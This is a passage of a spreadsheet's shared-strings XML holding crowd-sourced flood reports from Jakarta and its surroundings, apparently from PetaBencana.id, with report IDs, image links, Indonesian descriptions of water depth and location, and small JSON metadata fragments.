  </si>
  <si>
    <t>https://images.petabencana.id/4d88bd53-e54d-4ab5-87f9-3e3903a0a4b1.jpg</t>
  </si>
  <si>
    <t>cc695c7b-f9cf-4417-9116-dfeb8cda1616</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc695c7b-f9cf-4417-9116-dfeb8cda1616.jpg</t>
  </si>
  <si>
    <t>Janur Asri, 40 cm min</t>
  </si>
  <si>
    <t>a7d9b27b-70bc-40b5-8074-687c692ccc9b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7d9b27b-70bc-40b5-8074-687c692ccc9b.jpg</t>
  </si>
  <si>
    <t>Jalan Cempaka - Kota Bambu Utara, Palmerah banjir setinggi lutut orang dewasa</t>
  </si>
  <si>
    <t>e0ea70ce-f6ba-4719-be21-da539c9787ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e0ea70ce-f6ba-4719-be21-da539c9787ab.jpg</t>
  </si>
  <si>
    <t>df117163-8711-482c-a6dd-df1eff596d96</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df117163-8711-482c-a6dd-df1eff596d96.jpg</t>
  </si>
  <si>
    <t>Perwira</t>
  </si>
  <si>
    <t>ac4bad13-4ca0-43cc-b64e-4a5d08c0092d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ac4bad13-4ca0-43cc-b64e-4a5d08c0092d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "374", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masih bisa silalaui</t>
  </si>
  <si>
    <t>Angke</t>
  </si>
  <si>
    <t>59140ad7-5f3a-4a2d-bd4c-ef32d320ca05</t>
  </si>
  <si>
    <t>https://images.petabencana.id/59140ad7-5f3a-4a2d-bd4c-ef32d320ca05.jpg</t>
  </si>
  <si>
    <t>Banjir banjir banjir datang lagi sayang, yok kita ngungsi kerumah orang. Aduh aduh tidak ada lowongan, tempatnya dipake penuh barang.</t>
  </si>
  <si>
    <t>6dfdd843-a6d3-4c47-9940-a83c41d0beda</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6dfdd843-a6d3-4c47-9940-a83c41d0beda.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 163, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di villa taman kartini Curah hujan sedang dan air yang terus meluap"</t>
  </si>
  <si>
    <t>5421b69b-df75-49d3-a30e-91cc53230d50</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5421b69b-df75-49d3-a30e-91cc53230d50.jpg</t>
  </si>
  <si>
    <t>Banjir Gading Elok Timur - Klp Cengkir</t>
  </si>
  <si>
    <t>bc1f6f23-92b2-4491-9bdc-5288cdf3ce2d</t>
  </si>
  <si>
    <t>Banjir Kelapa Gading Jilid 4</t>
  </si>
  <si>
    <t>0bb9f39f-a5b4-457c-91dd-4ed8f9a4e938</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0bb9f39f-a5b4-457c-91dd-4ed8f9a4e938.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi 25 cm di dekat POM Bensin Harapan Indah</t>
  </si>
  <si>
    <t>5e132294-7796-4bca-974a-67acd0634d61</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5e132294-7796-4bca-974a-67acd0634d61.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "648", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sabang dekat kebon sirih</t>
  </si>
  <si>
    <t>2fb72205-eb85-4f20-830b-7de526f13ef5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2fb72205-eb85-4f20-830b-7de526f13ef5.jpg</t>
  </si>
  <si>
    <t>Jl arus dalam RT 08 RW 001 Sekitar 1 meter sampai 3 meter masih hujan sampai sekarang"</t>
  </si>
  <si>
    <t>d9d18188-6f87-42aa-a389-2ef3c3640e36</t>
  </si>
  <si>
    <t>Banjir ke2 2020</t>
  </si>
  <si>
    <t>5012e6d1-f6b4-46ce-b5aa-7e321ea5c9e0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5012e6d1-f6b4-46ce-b5aa-7e321ea5c9e0.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 68, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Tidak dapat dilalui kendaraan, warga terbiasa dan terevakuasi</t>
  </si>
  <si>
    <t>28188cf9-4ec6-4cc7-acb4-f31db1f6fbcb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/28188cf9-4ec6-4cc7-acb4-f31db1f6fbcb.jpg</t>
  </si>
  <si>
    <t>Perumahan Gading Arcadia, Pegangsaan Dua, Kelapa Gading, Jakarta Utara.</t>
  </si>
  <si>
    <t>835e0301-eb9d-450d-a521-5792c9b7fb7b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/835e0301-eb9d-450d-a521-5792c9b7fb7b.jpg</t>
  </si>
  <si>
    <t>Di depan jalan rumah air sdh setengah mobil rush. Di depan komplek air sdh 2 meter</t>
  </si>
  <si>
    <t>705205bc-f3a7-41e7-ab57-ce098bbbce72</t>
  </si>
  <si>
    <t>https://images.petabencana.id/705205bc-f3a7-41e7-ab57-ce098bbbce72.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2428", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di kelurahan petogogan. Sempat ada ular di air banjir. Stay safe teman2 kalau ada yang menerobos banjir</t>
  </si>
  <si>
    <t>eccb9fef-18fe-42d2-8021-b0b8d0e4feb5</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 108, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir setinggi pinggang orang dewasa</t>
  </si>
  <si>
    <t>1a0e9069-6b8e-4003-886e-322e404b4423</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1a0e9069-6b8e-4003-886e-322e404b4423.jpg</t>
  </si>
  <si>
    <t>Banjir se.lutut</t>
  </si>
  <si>
    <t>be401bab-4386-4748-9187-ab407b47f42f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/be401bab-4386-4748-9187-ab407b47f42f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "345", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>bf8f682a-28ff-424a-8d87-cd6a9253d1f2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bf8f682a-28ff-424a-8d87-cd6a9253d1f2.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "846", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jalan menuju Puri Mutiara ditutup sama mobil polisi karena ada banjir</t>
  </si>
  <si>
    <t>30cc95fa-8b7f-4add-b5c1-6a82c9c21a35</t>
  </si>
  <si>
    <t>https://images.petabencana.id/30cc95fa-8b7f-4add-b5c1-6a82c9c21a35.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1464", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kendaraan sama sekali tdk bisa lewat, tinggi kurang lebih se-pangkal paha orang dewasa dan belum surut</t>
  </si>
  <si>
    <t>93ad1d41-9da6-41ba-a721-a3c9cd737c2e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93ad1d41-9da6-41ba-a721-a3c9cd737c2e.jpg</t>
  </si>
  <si>
    <t>Yos Sudarso depan AHM hingga ajinomoto 10-15cm</t>
  </si>
  <si>
    <t>9a0c6f81-83cb-44dd-b72a-76813206adf5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9a0c6f81-83cb-44dd-b72a-76813206adf5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1217", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Telah terjadi banjir di kawasan gg masjid Dalam 1a kemang Jakarta selatan</t>
  </si>
  <si>
    <t>Cilandak Timur</t>
  </si>
  <si>
    <t>86ce45bf-5e6d-49ca-b5b6-de6453a951a7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/86ce45bf-5e6d-49ca-b5b6-de6453a951a7.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 22, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir 20-25 cm di Perumahan Irigasi, Kel. Bekasi Jaya, Kec. Bekasi Timur, Kota Bekasi.</t>
  </si>
  <si>
    <t>bf4347b6-d68f-442d-b599-0a8b52277ab7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bf4347b6-d68f-442d-b599-0a8b52277ab7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2252", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan air depan depo inggome + spil</t>
  </si>
  <si>
    <t>40c35b35-6e59-4024-bced-fed498bc3704</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40c35b35-6e59-4024-bced-fed498bc3704.jpg</t>
  </si>
  <si>
    <t>Banjir Puri Bintara 70 cm sepaha orang dewasa</t>
  </si>
  <si>
    <t>590c486a-4c4c-4fb9-9427-623ed9450fae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/590c486a-4c4c-4fb9-9427-623ed9450fae.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "577", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir yg ke 5x di Aspol KEMAYORAN JAKARTA PUSAT</t>
  </si>
  <si>
    <t>a118f847-90a2-42ec-ade7-bfc4b3ca87ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a118f847-90a2-42ec-ade7-bfc4b3ca87ce.jpg</t>
  </si>
  <si>
    <t>Komplek suplir Kel. Jakasampurna Kec Bekasi Barat"</t>
  </si>
  <si>
    <t>fe25d3b9-b112-4d5b-89a4-565b87592d5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fe25d3b9-b112-4d5b-89a4-565b87592d5a.jpg</t>
  </si>
  <si>
    <t>rajawali selatan xi udah sebetis. seharusnya sekeliling sni lebih parah karena raselas trmasuk yg tingi</t>
  </si>
  <si>
    <t>b7491dca-816a-4781-9b88-dae506ce15ad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7491dca-816a-4781-9b88-dae506ce15ad.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 35, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Sunter, banjir kali ini kebih tinggi dari kemarin-kemarin</t>
  </si>
  <si>
    <t>fbc2c853-7aa8-4dd7-89e0-2e5c8c94a430</t>
  </si>
  <si>
    <t>Ketinggian bervariasi, dari semata kaki -hingga paha orang dewasa</t>
  </si>
  <si>
    <t>9c1c2059-d93c-46f0-9827-7143de914267</t>
  </si>
  <si>
    <t>Hanya bisa dilewati motor dengan melipir ke jalur transjakarta</t>
  </si>
  <si>
    <t>bbd38f86-8fcb-4fa7-9b6d-d2ecddc93a25</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bbd38f86-8fcb-4fa7-9b6d-d2ecddc93a25.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "615", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Serdang Baru, sedengkul orang dewasa. Harap berhati-hati, jangan melintas lewat sini.</t>
  </si>
  <si>
    <t>62b157b6-d752-4e74-bcd4-e804ee996a05</t>
  </si>
  <si>
    <t>Banjir depan Monas</t>
  </si>
  <si>
    <t>5f521dd0-87f7-4d30-b236-56c49006b462</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5f521dd0-87f7-4d30-b236-56c49006b462.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan wahidin 2, ketinggian bervariasi dari 30 hingga 90 cm</t>
  </si>
  <si>
    <t>7a70c196-7698-4287-b51f-a6f72f674fe3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7a70c196-7698-4287-b51f-a6f72f674fe3.jpg</t>
  </si>
  <si>
    <t>5a147967-2c38-4582-ba39-fc3589f86eb2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a147967-2c38-4582-ba39-fc3589f86eb2.jpg</t>
  </si>
  <si>
    <t>1aeb4415-6f78-411a-af34-59a547c6efd3</t>
  </si>
  <si>
    <t>Air setinggi lutut</t>
  </si>
  <si>
    <t>d042cf1a-6a74-430f-b469-5404c1ff28f8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d042cf1a-6a74-430f-b469-5404c1ff28f8.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 97 }</t>
  </si>
  <si>
    <t>9fbd3ebd-2d3d-4c5b-b891-ae2add653a76</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9fbd3ebd-2d3d-4c5b-b891-ae2add653a76.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1906", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Cantik permai residence</t>
  </si>
  <si>
    <t>a9845af8-03a5-44af-85ca-0e36428e5445</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9845af8-03a5-44af-85ca-0e36428e5445.jpg</t>
  </si>
  <si>
    <t>2d2d827d-a359-4b98-9540-8048bf95040c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2d2d827d-a359-4b98-9540-8048bf95040c.jpg</t>
  </si>
  <si>
    <t>Kondisi jam 7</t>
  </si>
  <si>
    <t>ff22733f-446e-486b-af4b-afacb00a1eab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff22733f-446e-486b-af4b-afacb00a1eab.jpg</t>
  </si>
  <si>
    <t>Hujan deras dari semalam mantap, tadi ada motor sudah mati karena banjir sudah sepaha</t>
  </si>
  <si>
    <t>f13ca564-9862-415a-90fa-e9e6df5fe883</t>
  </si>
  <si>
    <t>3bbe3240-9d8b-40ac-9c72-b9dbcc5a3e11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3bbe3240-9d8b-40ac-9c72-b9dbcc5a3e11.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "64", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>e5135689-02a8-4482-bf06-140d12457ef9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e5135689-02a8-4482-bf06-140d12457ef9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2000", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di lodan dalam</t>
  </si>
  <si>
    <t>73c2ea9d-7815-4972-937a-1a4f837d4953</t>
  </si>
  <si>
    <t>https://images.petabencana.id/73c2ea9d-7815-4972-937a-1a4f837d4953.jpg</t>
  </si>
  <si>
    <t>Banjir 30-40cm</t>
  </si>
  <si>
    <t>3710436e-b792-4b3f-95f4-e7972f020a50</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2535", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>genangan</t>
  </si>
  <si>
    <t>ef348829-83bb-47fc-98cf-1d4aea81e2c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ef348829-83bb-47fc-98cf-1d4aea81e2c6.jpg</t>
  </si>
  <si>
    <t>Banjir lagi tadi pagi untuk ke 2 kalinya kemarin minggu subuh juga banjir.</t>
  </si>
  <si>
    <t>cc10f540-7848-4e4e-bad0-4e3dd7b4b988</t>
  </si>
  <si>
    <t>Kondisi jalan depan pascasarjana UIJ</t>
  </si>
  <si>
    <t>f8049f15-7818-4ad9-87d4-8d122b35cb16</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f8049f15-7818-4ad9-87d4-8d122b35cb16.jpg</t>
  </si>
  <si>
    <t>ketinggian air sdh mencapai paha org dewasa</t>
  </si>
  <si>
    <t>e975dcad-04ee-48d3-9d8c-ac9cf03516ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e975dcad-04ee-48d3-9d8c-ac9cf03516ea.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "687", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dijalan karang anyar Utara tinggi air kurang lebih 40-60cm</t>
  </si>
  <si>
    <t>daf20237-b52f-40c6-8e75-93a8041e146e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/daf20237-b52f-40c6-8e75-93a8041e146e.jpg</t>
  </si>
  <si>
    <t>Perumahan jatibening permai, jl flamboyan 103, banjir 130cm, sudah masuk rumah,</t>
  </si>
  <si>
    <t>63db6adf-c331-48a1-86e9-086d37f8e517</t>
  </si>
  <si>
    <t>https://images.petabencana.id/63db6adf-c331-48a1-86e9-086d37f8e517.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 115 }</t>
  </si>
  <si>
    <t>740e54c6-6581-4425-a9e8-fee98a93befe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/740e54c6-6581-4425-a9e8-fee98a93befe.jpg</t>
  </si>
  <si>
    <t>227e4074-ce7d-4312-833d-427c6e9b599c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/227e4074-ce7d-4312-833d-427c6e9b599c.jpg</t>
  </si>
  <si>
    <t>Banjir parah, dan belum ada tanda2 mau surut nih</t>
  </si>
  <si>
    <t>691ca990-f91c-485b-8bb3-5dee9d5b0004</t>
  </si>
  <si>
    <t>https://images.petabencana.id/691ca990-f91c-485b-8bb3-5dee9d5b0004.jpg</t>
  </si>
  <si>
    <t>daadb802-749c-4b06-a916-1edee3929f21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/daadb802-749c-4b06-a916-1edee3929f21.jpg</t>
  </si>
  <si>
    <t>Tinggi banjir hampir sama dengan kejadian pada saat Tahun baru</t>
  </si>
  <si>
    <t>ce9d476e-50f3-4f86-bdb8-b1612e964c79</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ce9d476e-50f3-4f86-bdb8-b1612e964c79.jpg</t>
  </si>
  <si>
    <t>Sudah sepinggang orang dewasa</t>
  </si>
  <si>
    <t>05b6b47a-d5d5-4e70-a7c3-2ffa166f5885</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05b6b47a-d5d5-4e70-a7c3-2ffa166f5885.jpg</t>
  </si>
  <si>
    <t>Banjir 30-50 cm di depan polsek tanjung duren, bagi pengendara roda 2 maupun roda 4 di himbau agar tidak melintas</t>
  </si>
  <si>
    <t>4dc3a664-60de-4e1b-9c96-1cf24c312f7c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4dc3a664-60de-4e1b-9c96-1cf24c312f7c.jpg</t>
  </si>
  <si>
    <t>Banjir dan lisrik PLN masih menyala. Stok makanan ga ada dan blm ada yg bagiin makanan.</t>
  </si>
  <si>
    <t>11930e7c-892c-4a75-908b-4e81ecb8cc1a</t>
  </si>
  <si>
    <t>Banjir bintara dari semalam</t>
  </si>
  <si>
    <t>db08f68d-4925-4650-8ba3-c7cee298acc1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/db08f68d-4925-4650-8ba3-c7cee298acc1.jpg</t>
  </si>
  <si>
    <t>04676711-fdb1-41a8-9e15-4138518c4f27</t>
  </si>
  <si>
    <t>https://images.petabencana.id/04676711-fdb1-41a8-9e15-4138518c4f27.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "238", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di tomang jati pulo, air kali banjir kanal barat sudah turun kerumah warga..</t>
  </si>
  <si>
    <t>75557558-556e-4359-b91a-2d3a597e707f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/75557558-556e-4359-b91a-2d3a597e707f.jpg</t>
  </si>
  <si>
    <t>Peruumahan pondok safari indah, pondok aren</t>
  </si>
  <si>
    <t>2cba734b-eb75-461b-8a11-7c204dca67b3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2cba734b-eb75-461b-8a11-7c204dca67b3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2502", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>SEPANJANG JL. GUNUNG SAHARI BANJIR SELUTUT</t>
  </si>
  <si>
    <t>da7ffd07-ca49-4cdd-ab58-6ee9a1a48135</t>
  </si>
  <si>
    <t>https://images.petabencana.id/da7ffd07-ca49-4cdd-ab58-6ee9a1a48135.jpg</t>
  </si>
  <si>
    <t>Rawalumbu banjir</t>
  </si>
  <si>
    <t>Bojong Rawalumbu</t>
  </si>
  <si>
    <t>f885be7b-f6f8-4c8b-9460-3dcd6467d234</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f885be7b-f6f8-4c8b-9460-3dcd6467d234.jpg</t>
  </si>
  <si>
    <t>8a7873dd-df96-4f26-87d8-da71a82ff0d0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8a7873dd-df96-4f26-87d8-da71a82ff0d0.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 21, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "642", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jam 8.00</t>
  </si>
  <si>
    <t>Cikini</t>
  </si>
  <si>
    <t>3dde8e90-7c94-4e60-9305-adf8320540e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3dde8e90-7c94-4e60-9305-adf8320540e1.jpg</t>
  </si>
  <si>
    <t>Summagung II</t>
  </si>
  <si>
    <t>743678fd-c7ae-4604-a604-58694caecf6c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/743678fd-c7ae-4604-a604-58694caecf6c.jpg</t>
  </si>
  <si>
    <t>1934f23e-220e-4577-b707-52627bb27659</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1934f23e-220e-4577-b707-52627bb27659.jpg</t>
  </si>
  <si>
    <t>Kelapa Gading jam 08.00</t>
  </si>
  <si>
    <t>4c64694a-7cc1-4f64-9a01-b429df54ce5b</t>
  </si>
  <si>
    <t>Tzico sebelah citypark</t>
  </si>
  <si>
    <t>98155023-061e-45cf-b0a3-bce97b0bf9d2</t>
  </si>
  <si>
    <t>Banjir di perumahan Puri Cikarang hijau</t>
  </si>
  <si>
    <t>8bf83227-87b4-40db-b179-e8386fe43828</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 137 }</t>
  </si>
  <si>
    <t>Perumahan Mas Naga, tanggal 25 Feb jam 05.00</t>
  </si>
  <si>
    <t>1ad26a3b-2a0a-4a9e-acf4-d45f345aede1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ad26a3b-2a0a-4a9e-acf4-d45f345aede1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "714", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan harco mangga dua</t>
  </si>
  <si>
    <t>4578938c-7299-41c1-b790-1c8ab32b1dc8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4578938c-7299-41c1-b790-1c8ab32b1dc8.jpg</t>
  </si>
  <si>
    <t>eb8cf277-7a3a-4d4a-b7a0-b21286808a1d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eb8cf277-7a3a-4d4a-b7a0-b21286808a1d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1477", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>didalam rumah 40cm dijalan 90 cm eramas2000"</t>
  </si>
  <si>
    <t>174d5c7e-486e-4f92-90cf-478ef9560edf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/174d5c7e-486e-4f92-90cf-478ef9560edf.jpg</t>
  </si>
  <si>
    <t>Ketinggian air 25-30cm lokasi MEKARSARI bekasi</t>
  </si>
  <si>
    <t>2f690ca9-4796-4fea-a62d-cc84fcd5bcdd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2f690ca9-4796-4fea-a62d-cc84fcd5bcdd.jpg</t>
  </si>
  <si>
    <t>Perum wisma jaya</t>
  </si>
  <si>
    <t>035dd2a6-92a3-4455-b6a5-c00b46422b8d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/035dd2a6-92a3-4455-b6a5-c00b46422b8d.jpg</t>
  </si>
  <si>
    <t>villa mutiara cibitung butuh bantuan evakuasi</t>
  </si>
  <si>
    <t>Wanajaya</t>
  </si>
  <si>
    <t>Cibitung</t>
  </si>
  <si>
    <t>04f2364a-f7c6-4265-bca3-17c01bb30640</t>
  </si>
  <si>
    <t>https://images.petabencana.id/04f2364a-f7c6-4265-bca3-17c01bb30640.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "512", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Juanda 3 banjir</t>
  </si>
  <si>
    <t>fbdd41fb-a268-4d9a-96f3-8c54f399fbe1</t>
  </si>
  <si>
    <t>Banjir di depan komplek PGA3</t>
  </si>
  <si>
    <t>Karang Timur</t>
  </si>
  <si>
    <t>f2f652f4-566a-4cd9-892e-9b595810009e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2f652f4-566a-4cd9-892e-9b595810009e.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi paha orang dewasa di jalan, Banjir masuk ke rumah warga sekitar jam 4an pagi.</t>
  </si>
  <si>
    <t>b36a8a57-b809-42a5-9b45-f2ad0a4b40da</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b36a8a57-b809-42a5-9b45-f2ad0a4b40da.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 79, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2590", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>045b1643-0b19-4513-b4cd-1a17603e2f5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/045b1643-0b19-4513-b4cd-1a17603e2f5a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1476", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di komplek eramas 2000 sebrang walikota jaktim</t>
  </si>
  <si>
    <t>6504686b-292a-4243-8080-67f0bf3f5b53</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6504686b-292a-4243-8080-67f0bf3f5b53.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1453", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sedengkul daerah kawasan pulo gadung</t>
  </si>
  <si>
    <t>96083bbb-6ae6-4774-9a2e-3c03d3ff0473</t>
  </si>
  <si>
    <t>https://images.petabencana.id/96083bbb-6ae6-4774-9a2e-3c03d3ff0473.jpg</t>
  </si>
  <si>
    <t>Lilin V kelapa gading</t>
  </si>
  <si>
    <t>e9b10579-631e-4f2e-abab-46c46c8704e8</t>
  </si>
  <si>
    <t>Banjir setinggi paha orang dewasa. Motor hanya tinggal tempat duduk. Lokasi di Perumahan Prima Tangerang.</t>
  </si>
  <si>
    <t>Karet</t>
  </si>
  <si>
    <t>Sepatan</t>
  </si>
  <si>
    <t>e3bac9a5-ddb4-47dc-a450-369f877e2b53</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e3bac9a5-ddb4-47dc-a450-369f877e2b53.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2591", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>1c876172-352c-4a3b-a6b6-2a3fd7c441a6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1c876172-352c-4a3b-a6b6-2a3fd7c441a6.jpg</t>
  </si>
  <si>
    <t>Komplek Bumi Satria Kencana- Jalan Timah</t>
  </si>
  <si>
    <t>88c7de38-299a-4895-9562-f0e690b8ee89</t>
  </si>
  <si>
    <t>Banjir di dekat spbu</t>
  </si>
  <si>
    <t>Karang Mulya</t>
  </si>
  <si>
    <t>2785a0e1-ce61-4a84-9256-32a4f6362184</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2785a0e1-ce61-4a84-9256-32a4f6362184.jpg</t>
  </si>
  <si>
    <t>banjir di jalur 3 dan 4 di jalur 4 sampe sebetis, tapi di jakur 1 masih bisa dilalui kendaraan</t>
  </si>
  <si>
    <t>cc8ba637-c598-4ac0-ac1e-4c89fe0e42a7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc8ba637-c598-4ac0-ac1e-4c89fe0e42a7.jpg</t>
  </si>
  <si>
    <t>Uwung Jaya</t>
  </si>
  <si>
    <t>827c2cd1-1de8-41a5-9b70-6b7fca81c544</t>
  </si>
  <si>
    <t>https://images.petabencana.id/827c2cd1-1de8-41a5-9b70-6b7fca81c544.jpg</t>
  </si>
  <si>
    <t>jam 4.30 di kali villa mutiara</t>
  </si>
  <si>
    <t>Wanasari</t>
  </si>
  <si>
    <t>6e4b0008-304c-4138-9830-3c40a0b214bd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6e4b0008-304c-4138-9830-3c40a0b214bd.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 35, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2433", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir cuy</t>
  </si>
  <si>
    <t>f12cef35-85d3-475b-940d-ca4411bfaecd</t>
  </si>
  <si>
    <t>karena derasnya hujan dari semalam. banjir tertinggi sudah se-paha orang dewasa. saat ini air pun belum surut</t>
  </si>
  <si>
    <t>e21022cb-61ce-4487-a632-e0b457300866</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e21022cb-61ce-4487-a632-e0b457300866.jpg</t>
  </si>
  <si>
